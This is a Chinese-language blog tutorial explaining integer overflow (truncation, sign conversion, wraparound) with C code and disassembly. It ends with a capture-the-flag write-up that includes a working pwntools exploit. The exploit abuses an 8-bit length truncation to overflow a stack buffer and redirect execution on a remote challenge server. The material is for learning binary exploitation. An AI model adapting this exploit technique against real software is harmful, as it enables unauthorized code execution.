简单的整数溢出

已于 2022-06-09 10:17:13 修改
阅读量3.1k 收藏 6
点赞数 21
分类专栏: 二进制安全 文章标签: c语言 c++ visual studio
于 2020-03-25 22:00:53 首次发布
本文为博主原创文章,转载请注明文章出处链接
本文链接:https://blog.csdn.net/weixin_41185953/article/details/105105853
版权

文章目录

0x01 为什么会存在整数溢出

回答这个问题前,我们需要了解下整数在计算机的存储方式。在计算机中,因为二值逻辑,只有开和关(通电、断电)来表示两种状态,这刚好与"0"、"1"相对应,因此在存储单元都是以0和1来呈现,那么对于有符号数与无符号数的区别就是:以所能表示的长度的空间,它的最高位所代表的性质不同,如下图所示:

在这里插入图片描述

这是一个存放8个1的8bit长度的存储单元,其最高位的不同(符号位和数值位)决定了它的绝对值的不同,当然决定了其取值范围的不同。
把握其中的三个关键点:
一、固定长度的空间(存储单元)
二、符号位和数值位
三、如果运算后发生进位溢出,绿色区域的空间依旧可以用
其实这样梳理以后,整数溢出的原理就随之对应而来了。

0x02 整数溢出原理

先来看一下整数溢出的危害
如果我们用某个整数来表示空间的大小或者说索引,那么整数溢出可以导致堆溢出或者栈溢出,间接导致任意代码执行。可以发现,整数溢出,实际上就是程序没有按照我们正常逻辑去进行(出乎意料),被恶意利用后就会产生危害。
可以对应上述(关键点)三种情况:
一、两个不同长度的储存空间进行赋值。将一个长度较长的数赋值给长度较短的空间,高位会被截断。
二、有符号数与无符号数之间的转换。由于最高位的性质不同,导致各种出乎意料的状况发生。
三、有(无)符号数的四则运算。比如符号相同的数就行相加,只有数值最高位或者符号位进位时,就会发生溢出;较大的无符号数的相加也会导致溢出。
具体的一些细节可以参考《计算机组成原理》的计算机的运算方法。

0x03 整数溢出例子分解

知道了原理,也清楚了类型,这里就一个一个分解,个人感觉论溢出的时候,从二进制出发考虑数据类型的取值范围和溢出临界点会更容易理解。

一、截断

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    int a = 65536;                   // 0x10000 -> 1 0000 0000 0000 0000
    short b;                     
    b = a;
    printf("%d\n", b);
    return 0;
}

short 为16bit(其中1位符号位),int为32bit(其中1位符号位)当把a(17bit)赋值给b时,会发生高位截断,从而b为 0000 0000 0000 0000,也就是0。再来详细看一下具体执行过程。

0040152E    C74424 1C 00000>mov dword ptr ss:[esp+0x1C],0x10000
// Stack ss:[0061FE9C]=00010000
00401536    8B4424 1C       mov eax,dword ptr ss:[esp+0x1C]
// eax=00010000
0040153A    66:894424 1A    mov word ptr ss:[esp+0x1A],ax
// 重点来了,取eax的低16位的值放到ss:[0061FE9A]中,也就是0000
0040153F    0FBF4424 1A     movsx eax,word ptr ss:[esp+0x1A]
// eax=00000000
00401544    894424 04       mov dword ptr ss:[esp+0x4],eax

可以发现,在执行的时候eax的高位被截断了,只有操作了低16位的存储的数值。

二、有(无)符号数之间的转换

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    unsigned short a = 32768;                   // 0x8000 -> 1000 0000 0000 0000
    short int b;                     
    b = a;
    printf("%d\n", b);
    return 0;
}

此时b又是多少呢?按照刚才的方法,从二进制的数入手,显然b为:1000 0000 0000 0000,虽然每一位的数没有变,但是最高位的性质变了,现在为符号位,也就是表示负数,后面15位为数值。那么此时的值是多少呢?计算机对负数是以补码的形式进行保存的,因此值为-2的15次方*1,也就是-32768。再来详细看一下具体执行过程。

0040152E    66:C74424 1E 00>mov word ptr ss:[esp+0x1E],0x8000
// Stack ss:[0061FE9E]=8000
00401535    0FB74424 1E     movzx eax,word ptr ss:[esp+0x1E]
// eax=0008000
0040153A    66:894424 1C    mov word ptr ss:[esp+0x1C],ax
// Stack ss:[0061FE9C]=8000
0040153F    0FBF4424 1C     movsx eax,word ptr ss:[esp+0x1C]
// 可以发现两次用到了不同的指令movzx和movsx,第一个是无符号扩展,并传送,第二个带符号扩展,并传送,所以此处的eax=FFF8000
00401544    894424 04       mov dword ptr ss:[esp+0x4],eax

三、有(无)符号的四则运算

先来看有符号的加法

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    short a = 32767;                   // 0x7fff -> 0111 1111 1111 1111            
    a++;
    printf("%d\n", a);
    return 0;
}

short最大数加一后,就会变成最小数。

在这里插入图片描述

再来详细看一下具体执行过程。

0040152E    66:C74424 1E FF>mov word ptr ss:[esp+0x1E],0x7FFF
// Stack ss:[0061FE9E]=7FFF
00401535    0FB74424 1E     movzx eax,word ptr ss:[esp+0x1E]
// eax=0007FFF
0040153A    83C0 01         add eax,0x1
// 执行自加,eax=008000
0040153D    66:894424 1E    mov word ptr ss:[esp+0x1E],ax
// Stack ss:[0061FE9E]=8000
00401542    0FBF4424 1E     movsx eax,word ptr ss:[esp+0x1E]
// 使用movsx把0x8000再次放进eax中,eax=FFF8000
00401547    894424 04       mov dword ptr ss:[esp+0x4],eax

再来看一下无符号数,其实原理是一样的,如果说有符号数是一个坐标轴(如上图所示),那么无符号数就是一个圆盘(如下图所示),无论上溢出还是下溢出,都是围绕圆心循环转。

在这里插入图片描述

分析完这几个类型后,疑惑就来了,说了这么多怎么利用呢?

0x03 实战

这里选用攻防世界的int_overflow为例进行分析
拖到IDA中查看伪代码

int __cdecl main(int argc, const char **argv, const char **envp){
  int v4; // [esp+Ch] [ebp-Ch]
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  puts("---------------------");
  puts("~~ Welcome to CTF! ~~");
  puts("       1.Login       ");
  puts("       2.Exit        ");
  puts("---------------------");
  printf("Your choice:");
  __isoc99_scanf("%d", &v4);
  if ( v4 == 1 ){
    login();
  }
  else{
    if ( v4 == 2 ){
      puts("Bye~");
      exit(0);
    }
    puts("Invalid Choice!");
  }
  return 0;
}

没有发现可疑问题,查看login()函数

int login(){
  char buf; // [esp+0h] [ebp-228h]
  char s; // [esp+200h] [ebp-28h]
  memset(&s, 0, 0x20u);
  memset(&buf, 0, 0x200u);
  puts("Please input your username:");
  read(0, &s, 0x19u);
  printf("Hello %s\n", &s);
  puts("Please input your passwd:");
  read(0, &buf, 0x199u);
  return check_passwd(&buf);
}

似乎也没什么可疑的地方,继续查看check_passwd(&buf),可以先注意下变量buf,因为他是可控的,长度为0x199

char *__cdecl check_passwd(char *s){
  char *result; // eax
  char dest; // [esp+4h] [ebp-14h]
  unsigned __int8 v3; // [esp+Fh] [ebp-9h]
  v3 = strlen(s);
  if ( v3 <= 3u || v3 > 8u ) {
    puts("Invalid Password");
    result = (char *)fflush(stdout);
  }
  else{
    puts("Success");
    fflush(stdout);
    result = strcpy(&dest, s);
  }
  return result;
}

查看到这里,我们首先发现就是strcpy函数导致的栈溢出,为什么这么说呢?
变量buf的长度0x199,又可以发现变量dest的位置是ebp-14h,也就是我们可以控制变量buf来控制函数的返回值,进而控制EIP的值,详细的原理和方法,可以参看走进栈溢出初探ROP
但是问题又来了,程序用了一个if语句限制了变量buf的长度,使得我们无法达到所想的栈溢出效果,是不是就无法攻击了?回到这一篇文章的核心思想,就知道我们需要寻找整数的溢出的地方。

unsigned __int8 v3; // [esp+Fh] [ebp-9h]
v3 = strlen(s);
if ( v3 <= 3u || v3 > 8u ) {

可以发现v3是一个8bit的无符号的变量,但是我们的变量buf(后面表示为s)的长度却可以达到0x199,也就是409bit的长度,这里就是我们在文章开头提到的第一种情况:将一个长度较长的数赋值给长度较短的空间,高位会被截断。如下图所示:

在这里插入图片描述

v3的数值就是s的长度的低8位的数值,所以我们只要控制低8位的值就可以绕过if,完成后面的栈溢出攻击。
继续分析,v3∈(3, 8],化为二进制(0000 0011, 0000 1000],那么s的长度(设为L)的低八位应该也为(0000 0011, 0000 1000],要想既达到整数溢出的目的,又能进行栈溢出攻击,L至少有一位(大于第八位)上的数值为1,这里选取只有第九位的数值为1,即L(低九位)∈(10000 0011, 10000 1000],也就是(259, 264],这也是整个L的长度。构造payload来获取flag,在IDA中可以找到

int what_is_this()
{
  return system("cat flag");
}
对应
.text:0804868B what_is_this    proc near
.text:0804868B ; __unwind {
.text:0804868B                 push    ebp
.text:0804868C                 mov     ebp, esp
.text:0804868E                 sub     esp, 8
.text:08048691                 sub     esp, 0Ch
.text:08048694                 push    offset command  ; "cat flag"
.text:08048699                 call    _system
.text:0804869E                 add     esp, 10h
.text:080486A1                 nop
.text:080486A2                 leave
.text:080486A3                 retn
.text:080486A3 ; } // starts at 804868B
.text:080486A3 what_is_this    endp

把返回地址覆盖为0x804868B即可获取flag,构造payload

payload = flat(['a' * 0x18, 0x804868B, 'a' * 232])
//像这种凑长度了使用payload = flat(['a' * 0x18, 0x804868B]).ljust(260,"a")

可以再用gdb确认一下溢出临界,在strcpy处下断点,如下图所示,这里可以详细推敲一下(虽然意义不大,但是挺好玩的),esp中存的是s的开始位置0xfffbbf4,ebp为0xfffbc08,可以发现是相差0x14。

在这里插入图片描述

其实这个elf文件的溢出临界也可以在汇编代码中找,如下图所示,有些文件会以esp+0xN来显示,因此可以用上面设置断点的方法找。

在这里插入图片描述

分析到这,此题也算是做完了,编写exp拿到flag即可,而且此题对整数溢出的应用更加深了。

from pwn import * 
io = remote("111.198.29.45", 35521) 
cat_flag_addr = 0x0804868B 
io.sendlineafter("Your choice:", "1") 
io.sendlineafter("your username:", "threepwn") 
payload = flat(['a' * 0x18, cat_flag_addr, 'a' * 232])
io.sendlineafter("your passwd:", payload) 
io.recv() 
io.interactive()

0x04 附录

借用ctfwiki的一幅图(个人感觉从二进制的数值入手会更容易理解整数溢出)

在这里插入图片描述

0x05 尾记

还未入门,详细记录每个知识点,为了能更好地温故知新,也希望能帮助和我一样想要入门二进制安全的初学者,如有错误,希望大佬们指出。
参考:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/integeroverflow/intof-zh/

仅此而已|
关注
  • 21
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
C++:数据类型范围
it_cplusplus
06-23 366
C++:数据类型范围C++:数据类型范围 C++:数据类型范围 Microsoft c + + 32 位和64位编译器可识别本文后面的表中的类型。 int (unsigned int) __int8 (unsigned __int8) __int16 (unsigned __int16) __int32 (unsigned __int32) __int64 (unsigned __int64) short (unsigned short) long (unsigned long) long long (un
VC++中的数据类型
hi
01-13 1309
对32位和64位的编译器,微软Visual C++ 所能识别的数据类型如下表所示。注意,下面的类型有对应的unsigned类型int (unsigned int) __int8 (unsigned __int8) __int16 (unsigned __int16) __int32 (unsigned __int32) __int64 (unsigned
整数溢出
wuxiaobingandbob的专栏
11-20 5497
http://blog.csdn.net/habla/article/details/1834658 整数溢出也是一种常见的软件漏洞,由此引发的bug可能比格式化字符串缺陷和缓冲区溢出缺陷更难于发现。前几天solaris系统中就爆出被人发现了一个整数溢出漏洞。在这里我们来翻译phrack杂志上的一篇关于整数溢出的文章,写得相当详细。平时时间不是很多,所以我不会一次把这篇文章全部翻译后才b
整数溢出详解
半岛铁盒的博客
04-04 3023
在 C 语言中,整数的基本数据类型分为短整型 (short),整型 (int),长整型 (long),这三个数据类型还分为有符号和无符号,每种数据类型都有各自的大小范围 当程序中的数据超过其数据类型的范围,则会造成溢出整数类型的溢出被称为整数溢出。 有以下两种情况???? 1.未限制范围 2.错误的类型转换 size_t,该类型相当于 unsigned long int,属于无符号长整型 ...
什么是整数溢出
06-22 3328
一、什么是整数溢出由于整数在内存里面保存在一个固定长度的空间内,它能存储的最大值和最小值是固定的,如果我们尝试去存储一个数,而这个数又大于这个固定的最大值时,就会导致整数溢出。(x86-3...
整型的溢出详解
gao_zhennan的博客
10-13 8029
前言:本文介绍的整型的溢出并不针对某种编程语言,通过数在机器中存储的方式,说明为什么会存在溢出以及溢出后数的实际存储情况。 一、什么是溢出(理解即可) 当我们在计算机中要存储的数超出了该类型数可以表示的范围就会发生溢出。例如,Java中的byte类型数据范围为[-128,127],你想要存储的数为128,此时会发生上溢;要存储的数为-129,此时会发生下溢。其核心思想是超出可以表示的范围。就像向杯子中倒水,水超出了杯子的容量,就会溢出来。 二、为什么会发生溢出 前文已经有所介绍:超出了可以表示的范围。 .
c语言 计算器_C语言学习日记(8)——整数溢出
weixin_39714835的博客
11-22 462
小时候喜欢玩电子计算器,觉得很神奇,想要算什么数,立刻就能算出来。当时看着计算器的液晶屏幕就想,如果算一个很大的数,超过了屏幕上面数字的位数,会怎么样呢?试了以后结果是INF,那就是无穷大了。虽然当时还小,但好像也知道那是电子计算器位数不足,从此觉得计算机虽然神奇,但计算能力也是有限的。同样,计算机虽然计算能力强大,但计算能力也受位数的限制,并不是无穷的。以int类型为例,当我们定义一个int类型...
整数溢出1
08-08
整数溢出原理:由于整数在内存里面保存在一个固定长度 (在本章中使用32位)的空间内,它能存储的最大值就是固定的,当尝试去存储一个数,而这个数又大于这个固定的最大
C++整数溢出的例子
10-23
一个程序例子 适用于刚开始学习C++学习的同学
Python 的整数与 Numpy 的数据溢出
09-18
主要介绍了Python 的整数与 Numpy 的数据溢出,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Google Chrome Skia整数溢出漏洞
05-05
Google Chrome Skia整数溢出漏洞
ERC20智能合约整数溢出系列漏洞披露
10-16
“清华-360企业安全联合研究中心”团队在区块链安全方面进行了持续研究,开发了自动化漏洞扫描工具,近期发现了多个新型整数溢出漏洞,可造成超额铸币、超额购币、随意铸币、高卖低收、下溢增持等严重危害。
关于C与C++的零散知识(六)
hhhhyiuxiu的博客
06-08 105
1.关于如何在标准C中定义一个其他字节大小的int类型整数 这两天在搞汇编课设碰到这个问题了,比如说我们对一个文件进行操作,我使用一个fgetc函数,它只能一次从当前文件指针处读取一个字节的信息且返回类型为int类型,这相当于是返回了一个4字节,用4字节的空间保存一个字节的数据,在某些操作中会造成错误,我想到的一个方法是,如果我能定义一个1个字节的int类型数据,那么我就能用一个字节的int类型变...
整数溢出漏洞和格式化字符串漏洞
AlexYoung28的博客
10-29 6104
漏洞成因: 在计算机中,整数类型分为无符号整数和有符号整数 两种。 有符号整数会在最高位用0表示正数,1表示负 数,而无符号整数则没有这种规则。 常见的整数类型有8位(单字节字符类型、布尔类型)、 16位(短整型)、32位(长整型)等。 当一个整数存入了比它本身小的存储空间中,超出了 数据类型所能表示的范围时,就会发生整数溢出。 1. 基础知识 整数数据类型 数据类型 : ...
二进制安全需要记住的取值范围 int8,unsigned int8,float32,Int32
半岛铁盒的博客
12-17 6321
int int8取值范围是-128 - 127 unsigned int8 0-255 Int16 意思是16位整数(16bit integer),相当于short 占2个字节 -32768 ~ 32767 Int32 意思是32位整数(32bit integer), 相当于 int 占4个字节 -2147483648 ~ 2147483647 Int64 意思是64位整数(64bit interger), 相当于 long long 占8个字节 -9223372036854775808 ~ 922337
C语言 | 什么是整数溢出
嵌入式大杂烩
02-15 6073
什么是整数溢出? 计算机语言中整数类型都有一个取值范围,两个整数进行运算时,若其结果大于最大值(上溢)或者小于最小值(下溢)就是溢出。 假如最大值为a,在最大值和最小值之间如果发生以下计算: a+1=0或0-1=a 此时就会发生溢出,其中a+1=0会发生上溢,0-1=a会发生下溢。 程序实例 // 整数溢出例子 #include &amp;amp;lt;stdio.h&amp;amp;gt; int main(void) {...
Java练习笔记(1)——整数为什么会溢出&判断整数溢出异常的方法
qq_42351519的博客
12-15 988
整数为什么会溢出 1. 计算机中的整数如何存储? 我们知道计算机中的符号化是根据ASCALL码来映射的。而计算机中的符合映射的基础是0和1. 即,符合在计算机中有对应的01序列。而0和1的序列组合的基础是二进制,因此,当我们想存 储整数在计算机内存中时,一般是将10进制的整数转换为二进制的01序列进行存储的。 2.整型数据类型和二进制的关系是什么? 该问题将让我们对整型的存储有所了解。 首先,我们知道整型数据类型有4个字节组成,一个字节是8个比特,一个比特即为一个01序列中的位, 那么我们知道整
深入理解GOT表和PLT表
KKABqN
03-14 4570
0x01 前言 操作系统通常使用动态链接的方法来提高程序运行的效率。 在动态链接的情况下,程序加载的时候并不会把链接库中所有函数都一起加载进来,而是程序执行的时候按需加载,如果有函数并没有被调用,那么它就不会在程序生命中被加载进来。 这样的设计就能提高程序运行的流畅度,也减少了内存空间。而且现代操作系统不允许修改代码段,只能修改数据段,那么GOT表与PLT表就应运而生。 0x02 初探GOT表......
appscan整数溢出漏洞修复
最新发布
06-09
整数溢出漏洞是一种非常常见的安全漏洞,可以通过以下几种方式来修复: 1. 使用无符号整数:在代码中使用无符号整数,这样可以避免整数溢出问题。 2. 检查输入参数:在处理输入参数时,对输入参数进行检查和验证,避免出现负数或者超出范围的情况。 3. 合理使用数据类型:在使用数据类型时,选择合适的数据类型,避免使用过小的数据类型导致溢出。 4. 使用异常处理机制:使用异常处理机制捕获溢出异常,避免程序异常终止。 5. 对于关键数据,进行完整性检查:对于关键数据,进行完整性检查,确保数据的准确性和完整性。 6. 安全编程实践:遵循安全编程实践,如代码审查、安全测试等,尽可能避免出现整数溢出漏洞。 在修复整数溢出漏洞时,需要根据具体情况选择适合的修复方案,并且要进行充分的测试和验证,确保修复的漏洞不会引入新的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值